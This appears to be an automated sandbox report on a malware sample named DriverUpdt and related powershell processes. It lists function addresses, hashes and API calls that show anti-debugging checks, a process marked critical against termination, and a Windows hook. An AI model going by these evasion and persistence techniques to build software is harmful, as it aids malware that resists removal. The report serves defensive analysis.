                            execution_graph 4516 7ff848f09d98 4518 7ff848f09da1 SetWindowsHookExW 4516->4518 4519 7ff848f09e71 4518->4519 4520 7ff848f07a51 4521 7ff848f07a6f CheckRemoteDebuggerPresent 4520->4521 4523 7ff848f07b0f 4521->4523 4548 7ff848f0b42e 4549 7ff848f0b46f 4548->4549 4550 7ff848f09858 RtlSetProcessIsCritical 4549->4550 4551 7ff848f0b49c 4550->4551 4524 7ff848f0ab25 4526 7ff848f0ab2f 4524->4526 4525 7ff848f0ac19 4526->4525 4530 7ff848f09858 4526->4530 4531 7ff848f09861 RtlSetProcessIsCritical 4530->4531 4533 7ff848f09932 4531->4533 4534 7ff848f09868 4533->4534 4535 7ff848f09871 RtlSetProcessIsCritical 4534->4535 4537 7ff848f09932 4535->4537 4537->4525 4538 7ff848f0a565 4539 7ff848f0a57f 4538->4539 4544 7ff848f09138 4539->4544 4541 7ff848f0a590 4542 7ff848f09138 RtlSetProcessIsCritical 4541->4542 4543 7ff848f0a59f 4541->4543 4542->4543 4544->4541 4545 7ff848f0b470 4544->4545 4546 7ff848f09858 RtlSetProcessIsCritical 4545->4546 4547 7ff848f0b49c 4546->4547 4547->4541 4552 7ff848f0764a 4553 7ff848f07a70 CheckRemoteDebuggerPresent 4552->4553 4555 7ff848f07b0f 4553->4555

                            Executed Functions

                            Function 00007FF848F016E9 Relevance: 2.0, Strings: 1, Instructions: 703COMMON
                            Download Yara Rule

                            Control-flow Graph

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3321572971.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f00000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID: CAP_^
                            • API String ID: 0-2920077663
                            • Opcode ID: 20ad0df7e119589af927ea39995456856159a6fe6858906a4f8f69ff944fe0f3
                            • Instruction ID: 4ddb0f213fa071c0712a7eb7fa919231f104973c9e83090407da20acc93e26e6
                            • Opcode Fuzzy Hash: 20ad0df7e119589af927ea39995456856159a6fe6858906a4f8f69ff944fe0f3
                            • Instruction Fuzzy Hash: CB22A030A2DA499FE799FB3884597B9B6D2FF89740F540579E40EC32C2EF28A8418745
                            Function 00007FF848F02361 Relevance: 1.6, Strings: 1, Instructions: 387COMMON
                            Download Yara Rule

                            Control-flow Graph

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3321572971.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f00000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID: H
                            • API String ID: 0-2852464175
                            • Opcode ID: 22fc89fba15c0f56651ef4092e11dc45db35d53c473672023544847be643c386
                            • Instruction ID: 6f2f16458d67d091d95d5a7683dbe9ad755c281969cf0b33299f675105322644
                            • Opcode Fuzzy Hash: 22fc89fba15c0f56651ef4092e11dc45db35d53c473672023544847be643c386
                            • Instruction Fuzzy Hash: 57C1B070F1D90A8FEB89FB68846627976D2FF99381F140579D04EC32D2EF38A8028755
                            Function 00007FF848F0764A Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 410 7ff848f0764a-7ff848f07b0d CheckRemoteDebuggerPresent 414 7ff848f07b15-7ff848f07b58 410->414 415 7ff848f07b0f 410->415 415->414
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3321572971.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f00000_DriverUpdt.jbxd
                            Similarity
                            • API ID: CheckDebuggerPresentRemote
                            • String ID:
                            • API String ID: 3662101638-0
                            • Opcode ID: dc6991035fe03aade0c5fcfbdc81cc7cbfc46cc24784884c791af730c87c64e2
                            • Instruction ID: b15d7b1d0867a76383ae4bdd109478bcc2ff2f8fd44982702ef62cba385c44d1
                            • Opcode Fuzzy Hash: dc6991035fe03aade0c5fcfbdc81cc7cbfc46cc24784884c791af730c87c64e2
                            • Instruction Fuzzy Hash: 6E31B431908A1C8FDB58DF5CC8497FA7BE0EF55311F04416AD48AD7241DB74A8568B91
                            Function 00007FF848F06096 Relevance: .5, Instructions: 476COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.3321572971.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f00000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: be56ae21686dadbe1ee8ac21789fc8d35fc01bcf7a1e77c41b1181bf4a5b3f8e
                            • Instruction ID: 4aa319ab41dab4ff5c8348fdf88a208aed5fd0832498e0bc64143103d7fd3e78
                            • Opcode Fuzzy Hash: be56ae21686dadbe1ee8ac21789fc8d35fc01bcf7a1e77c41b1181bf4a5b3f8e
                            • Instruction Fuzzy Hash: F4F1A33090CB8D8FEBA8EF28C8557E937E1FF55351F04426AE84DC7295DB3899458B82
                            Function 00007FF848F06E42 Relevance: .5, Instructions: 462COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.3321572971.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f00000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 63f07216c9a6653004583fdd9b10c8b33f0856ae9810293e8f5d0f02997d8e0e
                            • Instruction ID: 779be597ac38a95eb35f38c6fd6139288e22b2354334cdb6c05d8fcf6aba0038
                            • Opcode Fuzzy Hash: 63f07216c9a6653004583fdd9b10c8b33f0856ae9810293e8f5d0f02997d8e0e
                            • Instruction Fuzzy Hash: 31E1D33090CA4E8FEBA8EF28C8557E977E1FF55351F14426AE84DC7291DF78A8448B81
                            Function 00007FF848F020C1 Relevance: .2, Instructions: 207COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.3321572971.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f00000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 088ff7b67545582c50a816aa6db76c58ec8734b7ee02837df9ed04eab4d33b5b
                            • Instruction ID: 0914b6f24ab7cbb9a01afb88d75ac00c2819576ffcb0d400c430d6efeeb41789
                            • Opcode Fuzzy Hash: 088ff7b67545582c50a816aa6db76c58ec8734b7ee02837df9ed04eab4d33b5b
                            • Instruction Fuzzy Hash: 8451F220A5E6C55FD797AB785864275BFE5DF8725AF0800FBE089C71D3EE180806C356
                            Function 00007FF848F09848 Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 192 7ff848f09848-7ff848f0af32 197 7ff848f0af3a-7ff848f0af5b 192->197 198 7ff848f0af61-7ff848f0af6c 197->198 199 7ff848f0af6e 198->199 200 7ff848f0af74-7ff848f0af90 198->200 199->200
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3321572971.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f00000_DriverUpdt.jbxd
                            Similarity
                            • API ID: CriticalProcess
                            • String ID:
                            • API String ID: 2695349919-0
                            • Opcode ID: 8f7e07f696d7425b039e20126c3458e8b8e77400860a0aec3c79d1b79ef980f9
                            • Instruction ID: 576d1837bf8fc38c18124d8190a814149b35a3a386dd26e5a25eb4ca20210ec8
                            • Opcode Fuzzy Hash: 8f7e07f696d7425b039e20126c3458e8b8e77400860a0aec3c79d1b79ef980f9
                            • Instruction Fuzzy Hash: AE41263190CB888FD729EBA898456F97BF0FF56301F14012FD08AC3692DB34A946C791
                            Function 00007FF848F09D98 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 305 7ff848f09d98-7ff848f09d9f 306 7ff848f09daa-7ff848f09e1d 305->306 307 7ff848f09da1-7ff848f09da9 305->307 311 7ff848f09ea9-7ff848f09ead 306->311 312 7ff848f09e23-7ff848f09e30 306->312 307->306 313 7ff848f09e32-7ff848f09e6f SetWindowsHookExW 311->313 312->313 315 7ff848f09e71 313->315 316 7ff848f09e77-7ff848f09ea8 313->316 315->316
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3321572971.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f00000_DriverUpdt.jbxd
                            Similarity
                            • API ID: HookWindows
                            • String ID:
                            • API String ID: 2559412058-0
                            • Opcode ID: f91c1758ca9d948050046b17420ff3d60efc3718feba1dfadd2efded7522f9ba
                            • Instruction ID: c74ea89d9dab024a58ea9bdd959c0e1473df62740677d0eea03e023ef5966fce
                            • Opcode Fuzzy Hash: f91c1758ca9d948050046b17420ff3d60efc3718feba1dfadd2efded7522f9ba
                            • Instruction Fuzzy Hash: 23412B30A1CA4C8FDB59EB6CD8466F9BBE1EB5A321F00023ED049C3692DF656852C7D1
                            Function 00007FF848F09868 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 395 7ff848f09868-7ff848f09930 RtlSetProcessIsCritical 400 7ff848f09938-7ff848f0996d 395->400 401 7ff848f09932 395->401 401->400
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3321572971.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f00000_DriverUpdt.jbxd
                            Similarity
                            • API ID: CriticalProcess
                            • String ID:
                            • API String ID: 2695349919-0
                            • Opcode ID: f35f3c326ba85be1152c907f79011f4f6426298aafe722d94f7017fb453b79de
                            • Instruction ID: b49c196392af64a2c6eb374ad5ac22700d03664bff9c609ce9bf3d201f8c0133
                            • Opcode Fuzzy Hash: f35f3c326ba85be1152c907f79011f4f6426298aafe722d94f7017fb453b79de
                            • Instruction Fuzzy Hash: B831133190CA588FDB29EB9898457F97BF0FF56311F04012EE08AD3682DB34A846CB91
                            Function 00007FF848F07A51 Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 403 7ff848f07a51-7ff848f07b0d CheckRemoteDebuggerPresent 407 7ff848f07b15-7ff848f07b58 403->407 408 7ff848f07b0f 403->408 408->407
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3321572971.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f00000_DriverUpdt.jbxd
                            Similarity
                            • API ID: CheckDebuggerPresentRemote
                            • String ID:
                            • API String ID: 3662101638-0
                            • Opcode ID: 8a4375d65705fc4fffe88f5ac0c0014bcea10a19b449e5cda363d65391fa989b
                            • Instruction ID: f8161fae2f51584e5b5ff5e33949540ac1120be6c24acc01d063b45d2afc9258
                            • Opcode Fuzzy Hash: 8a4375d65705fc4fffe88f5ac0c0014bcea10a19b449e5cda363d65391fa989b
                            • Instruction Fuzzy Hash: 97311331908B5C8FCB58DF58C88A7E97BE0FF65311F05416BD489D7282DB34A846CB91

                            Executed Functions

                            Function 00007FF848FF6605 Relevance: 7.9, Strings: 6, Instructions: 435COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2130192111.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (B$I$(B$I$(B$I$(B$I$(B$I$X73l
                            • API String ID: 0-4065089512
                            • Opcode ID: c79c0d08f082d131ac162a6d544eba738d250b66c6fdd935c7ebce7bf3ddd124
                            • Instruction ID: 9fb0a5be8391b3348c860fe19e6793819fefa0706fd40f27c57261c28fc2a464
                            • Opcode Fuzzy Hash: c79c0d08f082d131ac162a6d544eba738d250b66c6fdd935c7ebce7bf3ddd124
                            • Instruction Fuzzy Hash: A1D15131D0EA8A5FE799AB2858155B5BBA0EF0A390F1801FFD14DCB1D3EE1CA805C355
                            Function 00007FF848F29D38 Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2129789865.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: K%\
                            • API String ID: 0-2006441787
                            • Opcode ID: fc2cc41c7a60a6b63c9edbbaad1853b89dceea61bf4879a9b8d6d9ec927415f6
                            • Instruction ID: dce1b1d6aef65a44ee874265546665d937d4022c4ffabca41a3075f1d4157c6c
                            • Opcode Fuzzy Hash: fc2cc41c7a60a6b63c9edbbaad1853b89dceea61bf4879a9b8d6d9ec927415f6
                            • Instruction Fuzzy Hash: D6F0827580CA8C8FDB45EF2898695A97FE0FF29201F0401EBE44DC71A1EB25D958CB81
                            Function 00007FF848FF4073 Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2130192111.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8>$I
                            • API String ID: 0-3301367642
                            • Opcode ID: 7b828d6bf2de77ea668fc017d8dbc5cdadc9715d37c16552cc60eda25e7dafe4
                            • Instruction ID: e4d7073d362606f3df1a9299fa2d5b438e5e939b4e2c96d852392e43f99d202e
                            • Opcode Fuzzy Hash: 7b828d6bf2de77ea668fc017d8dbc5cdadc9715d37c16552cc60eda25e7dafe4
                            • Instruction Fuzzy Hash: 6B51D032A0DA4A4FE79AEB2C541167577E2FFA5260F5801BBD24EC72D3DF18E8058349
                            Function 00007FF848FF40BF Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2130192111.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8>$I
                            • API String ID: 0-3301367642
                            • Opcode ID: f880b37a1504d69ae495f001e2558b12d2b828865930c24f24394089272c399d
                            • Instruction ID: 12d0400e416ac37e0e2d37e0aa67d99439e5a39f4d9e0ecd19d40dc1822a8a24
                            • Opcode Fuzzy Hash: f880b37a1504d69ae495f001e2558b12d2b828865930c24f24394089272c399d
                            • Instruction Fuzzy Hash: 33218D32E0E98B4FE7AAEB2C545117466D1FF74290F5901BAD25DC72E2DF18EC058349
                            Function 00007FF848F2A042 Relevance: .3, Instructions: 313COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.2129789865.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5c1a5681b6d091f352f623b49c74eb1aedf0da2a39f064c3c50d0a73c46cea76
                            • Instruction ID: 264373c7f0eaee6b91eb6990d46178b22dcb81d144d0290eb29a312e02143353
                            • Opcode Fuzzy Hash: 5c1a5681b6d091f352f623b49c74eb1aedf0da2a39f064c3c50d0a73c46cea76
                            • Instruction Fuzzy Hash: C441A53280E6C59FD752EB78A8620E53F70EF12268F0902F7D0888E0A3EA1D58598756
                            Function 00007FF848F29768 Relevance: .1, Instructions: 126COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.2129789865.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 98708bd544333ee03ec8102d03b2fec4065de433b4de1ea80ae2fdbde1a27ea8
                            • Instruction ID: 9017e19462f0ea43cc5862d8638838dbba2c4050d897c8327342c50c58d17f8b
                            • Opcode Fuzzy Hash: 98708bd544333ee03ec8102d03b2fec4065de433b4de1ea80ae2fdbde1a27ea8
                            • Instruction Fuzzy Hash: 0B31087191CB488FDB18DF5CA8066F97BE0FB98711F00422FE449D3691CB31A8568BC2
                            Function 00007FF848E0E380 Relevance: .1, Instructions: 125COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.2129378410.00007FF848E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E0D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848e0d000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d9ab2d21fab59f55cf880adbffad92b404cbad4a6d50831bac0469f853e67e60
                            • Instruction ID: 330d6591884ec7aa049f59359a36fbe92fa82702f0ccf1a0c284991fd0a15545
                            • Opcode Fuzzy Hash: d9ab2d21fab59f55cf880adbffad92b404cbad4a6d50831bac0469f853e67e60
                            • Instruction Fuzzy Hash: C441EF7080DBC54FE7569B28A8459523FB0EF53360F150AFFD088CB1A3E729A846C792
                            Function 00007FF848F2A62C Relevance: .1, Instructions: 97COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.2129789865.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b00b567e0ab31d47fcc2a5634f15094ce1357654586a93f1a29c4bc5f0530329
                            • Instruction ID: 92db06c33f717ff9004fe8e856737467617c52074562fbbdb47585de801f4a5b
                            • Opcode Fuzzy Hash: b00b567e0ab31d47fcc2a5634f15094ce1357654586a93f1a29c4bc5f0530329
                            • Instruction Fuzzy Hash: 6121477080DB884FE709DBA89C4AAF97FE4DF13321F08429ED045CB0A3DA69544AC761
                            Function 00007FF848F233B5 Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.2129789865.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                            • Instruction ID: b81149d342438cc37704c2a90a5bc61e4b8c38b5d9d18ebcc6d248958a2491c8
                            • Opcode Fuzzy Hash: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                            • Instruction Fuzzy Hash: 6A01677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC36A5DB36E892CB46
                            Function 00007FF848FF43FA Relevance: .0, Instructions: 37COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.2130192111.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 09c8ddb0d0395f124caddf9e20a8d3e69c7e005f12d8a7c3fbf299655f589b71
                            • Instruction ID: 7e1c3ae5898979a2193a2b7b82a81bbc69854c81746028a451958890e6b21308
                            • Opcode Fuzzy Hash: 09c8ddb0d0395f124caddf9e20a8d3e69c7e005f12d8a7c3fbf299655f589b71
                            • Instruction Fuzzy Hash: 41F09A31A0C5458FDB54EB5CA4448A8B7E0FF15360F4500B6E15DD71A3DB2AAC608764

                            Non-executed Functions

                            Function 00007FF848F28BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2129789865.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: M_^4$M_^7$M_^F$M_^J
                            • API String ID: 0-622050427
                            • Opcode ID: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                            • Instruction ID: 4b251d57f47bb37acb7270bcb3fcd5e7a9f7ff78876cdeb73e676b5544b6a454
                            • Opcode Fuzzy Hash: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                            • Instruction Fuzzy Hash: 6C213B7761A465DED3427B7DB8045DA3750DF942B8B8503B2E098CF083FE1C70868AD4

                            Executed Functions

                            Function 00007FF848FD6605 Relevance: 6.7, Strings: 5, Instructions: 432COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.2231328339.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_7ff848fd0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (B"I$(B"I$(B"I$(B"I$(B"I
                            • API String ID: 0-3570690463
                            • Opcode ID: c5006ce0c8d797cf53e03de8b012d8222b91c2e0028b8809687976f4be491768
                            • Instruction ID: 2f34d59982ae648dd1be13463c8f96b7d002ebd66cf27a3aa089f2823e072864
                            • Opcode Fuzzy Hash: c5006ce0c8d797cf53e03de8b012d8222b91c2e0028b8809687976f4be491768
                            • Instruction Fuzzy Hash: 0DC14331D0EA8A5FE795EB2858145B6BBE0EF16390F1801FAD50ECB1D3EB1CA8058795
                            Function 00007FF848FD4073 Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.2231328339.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_7ff848fd0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8>"I
                            • API String ID: 0-2459728092
                            • Opcode ID: 18b38e97fb938e4b27d654a81cd2a0631e8899e08cf9c00bacc7562cabe10eb6
                            • Instruction ID: 06df661b53c08b77f943f79c3a35435f660f74c9406829b524ca13c92fb2870f
                            • Opcode Fuzzy Hash: 18b38e97fb938e4b27d654a81cd2a0631e8899e08cf9c00bacc7562cabe10eb6
                            • Instruction Fuzzy Hash: 01512232E0DA4A4FE79AEB2C541167577E2FFA5260F5801BAC24EC72D2DF18EC058749
                            Function 00007FF848FD40BF Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.2231328339.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_7ff848fd0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8>"I
                            • API String ID: 0-2459728092
                            • Opcode ID: 5b5f0fa55999077a44323c8e70d9283a6d5179880be97fa3ba471612bd39a9d8
                            • Instruction ID: 28a990d86d05f0901ce2532bee557edca40af8da2f17c588e940472cf5281d3e
                            • Opcode Fuzzy Hash: 5b5f0fa55999077a44323c8e70d9283a6d5179880be97fa3ba471612bd39a9d8
                            • Instruction Fuzzy Hash: 2821A032E0E98B4FE7AAEB2C545517466D1FF74290F5911BAC25EC72E2CF18EC048B49
                            Function 00007FF848F0A828 Relevance: .2, Instructions: 190COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.2230485005.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_7ff848f00000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a7d372ea6c40583342d981ae1117a12c38488e938d0155296fd6eead14962e01
                            • Instruction ID: 5101affc4afad957d4b961589fc4ac64c138c740b93589a56d653e55c85369ac
                            • Opcode Fuzzy Hash: a7d372ea6c40583342d981ae1117a12c38488e938d0155296fd6eead14962e01
                            • Instruction Fuzzy Hash: 95513A3160DB854FD34AEB28D8955B07BE0FF56358B1401BED4C9C7293FA19A843C755
                            Function 00007FF848F09780 Relevance: .1, Instructions: 128COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.2230485005.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_7ff848f00000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dbb9fda4cdb183acffacbe06698606b0bf7cfcb4a1bbbc2d00cadde4668dab0e
                            • Instruction ID: b83706e96af62550394d6d51d762a88bc090689212d7177ff2d0cd8618c6b736
                            • Opcode Fuzzy Hash: dbb9fda4cdb183acffacbe06698606b0bf7cfcb4a1bbbc2d00cadde4668dab0e
                            • Instruction Fuzzy Hash: EB31077191CB888FDB189B1C98066B97BF0FB99710F00426FE449C3692DB70A856CBC2
                            Function 00007FF848DEED40 Relevance: .1, Instructions: 125COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.2229745764.00007FF848DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DED000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_7ff848ded000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8d94aa6bffd66941ea2bc4e43dc99edd3e8142c8655ea7fc953d4c4e3f430051
                            • Instruction ID: bb715be45f23f15f164424f1d4f0a9f0fc2d48e4372f60abdf9c2ffbec8c2c79
                            • Opcode Fuzzy Hash: 8d94aa6bffd66941ea2bc4e43dc99edd3e8142c8655ea7fc953d4c4e3f430051
                            • Instruction Fuzzy Hash: 7F41E83080EBC44FE7569B299841A623FF0EF57264F1905DFD088CB1A3D729A84AC792
                            Function 00007FF848F0A73C Relevance: .1, Instructions: 110COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.2230485005.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_7ff848f00000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 258eb71df2109087bae8f9a11369c4e2200e7300461cd2bf715d01eda6b54f26
                            • Instruction ID: 6836d7fc2d3739ae77bb32e2d1a51f16c6615ea3252b8846ad1ec8618f3f3e0c
                            • Opcode Fuzzy Hash: 258eb71df2109087bae8f9a11369c4e2200e7300461cd2bf715d01eda6b54f26
                            • Instruction Fuzzy Hash: C431367080D7884FD719CB689C496B97FE4EF63320F0881AED044DB1A3DA685846CB61
                            Function 00007FF848F033B5 Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.2230485005.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_7ff848f00000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9895435140380c782189f81496fffaa590a70fd196a779c416207eeb9efb34d6
                            • Instruction ID: 7751a646eaf869edea33559e4a2383cdbafb38eb3a9baaa8760fd3dac5d19060
                            • Opcode Fuzzy Hash: 9895435140380c782189f81496fffaa590a70fd196a779c416207eeb9efb34d6
                            • Instruction Fuzzy Hash: DE01677111CB0C4FD744EF0CE451AA5B7E0FB95364F50056EE58AC3695DB36E882CB45
